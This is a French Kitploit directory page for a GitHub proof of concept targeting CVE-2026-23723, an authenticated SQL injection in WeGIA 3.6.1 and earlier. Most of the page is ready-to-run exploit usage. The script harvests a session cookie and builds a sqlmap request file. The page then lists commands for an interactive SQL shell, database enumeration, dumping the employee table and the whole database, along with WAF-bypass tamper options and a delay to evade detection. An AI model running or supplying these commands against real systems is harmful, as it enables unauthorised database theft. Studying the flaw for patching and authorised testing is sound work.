Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23723-POC — Ce script d'assistance léger en Python est conçu pour automatiser la génération de fichiers PoC compatibles avec sqlmap pour la vulnérabilité d'injection SQL basée sur les erreurs authentifiée dans WeGIA (≤ 3.6.1), identifiée sous le nom GHSA-xfmp-2hf9-gfjp. | Kitploit
Outils/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Ce script d'assistance léger en Python est conçu pour automatiser la génération de fichiers PoC compatibles avec sqlmap pour la vulnérabilité d'injection SQL basée sur les erreurs authentifiée dans WeGIA (≤ 3.6.1), identifiée sous le nom GHSA-xfmp-2hf9-gfjp.

Voir le dépôt
31il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23723 PoC - Aide à l'exploitation d'injection SQL authentifiée WeGIA

Injection SQL basée sur les erreurs authentifiée dans WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Avis officiel

Auteur original du PoC / Rapporteur : ViniCastro2001 GHSA publié par : nilsonLazarin (mainteneur du projet)

Ce script Python léger automatise :

  • La connexion au système WeGIA à l'aide des identifiants fournis
  • L'extraction d'un cookie de session PHP valide
  • La génération d'un fichier de requête compatible sqlmap (point d'injection marqué comme id_memorando=1*)
  • L'affichage de commandes sqlmap prêtes à l'emploi pour l'énumération, le shell interactif et l'extraction de données

Fonctionnalités

  • Essaie plusieurs chemins de connexion courants et noms de champs de formulaire pour une meilleure compatibilité
  • Génère un fichier de requête sqlmap (.req)
  • Fournit des commandes sqlmap copiables-collables pour :
    • Un shell interactif de type MySQL (--sql-shell)
    • L'énumération des bases de données / tables
    • L'extraction ciblée d'une table ou l'extraction complète de la base de données

Prérequis

  • Python 3.x
  • Bibliothèque requests (la plupart des environnements de test d'intrusion l'ont déjà)
  • sqlmap installé et dans votre PATH

Installation

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Utilisation

root@kitploit:~
# Recommandé : invite de saisie interactive du mot de passe
python CVE-2026-23723.py --url http://target.com -u admin

# Fournir le mot de passe directement
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Fichier de sortie personnalisé
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

Après une exécution réussie, le script va :

Tenter la connexion Générer wegia_sqlmap.req (ou votre nom de fichier personnalisé) Afficher les commandes sqlmap prêtes à l'emploi

Exemple de commandes générées :

root@kitploit:~
# 1. Shell interactif de type MySQL (le plus recommandé)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Afficher la base courante et toutes les bases
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Lister les tables de la base wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Extraire une table spécifique (exemple : funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Extraire toute la base wegia (attention !)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Options sqlmap facultatives :

--proxy=http://127.0.0.1:8080 (via Burp/ZAP)
--tamper=space2comment,randomcase (contournement WAF basique)
--delay=1 (ralentir pour éviter la détection)

Si la connexion automatique échoue Connectez-vous manuellement via le navigateur → copiez l'en-tête Cookie complet → exécutez sqlmap directement :

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Avertissement légal Ce PoC est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés. Toute utilisation non autorisée contre un système est illégale et interdite. L'auteur et les contributeurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés. Références

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Télécharger l’outil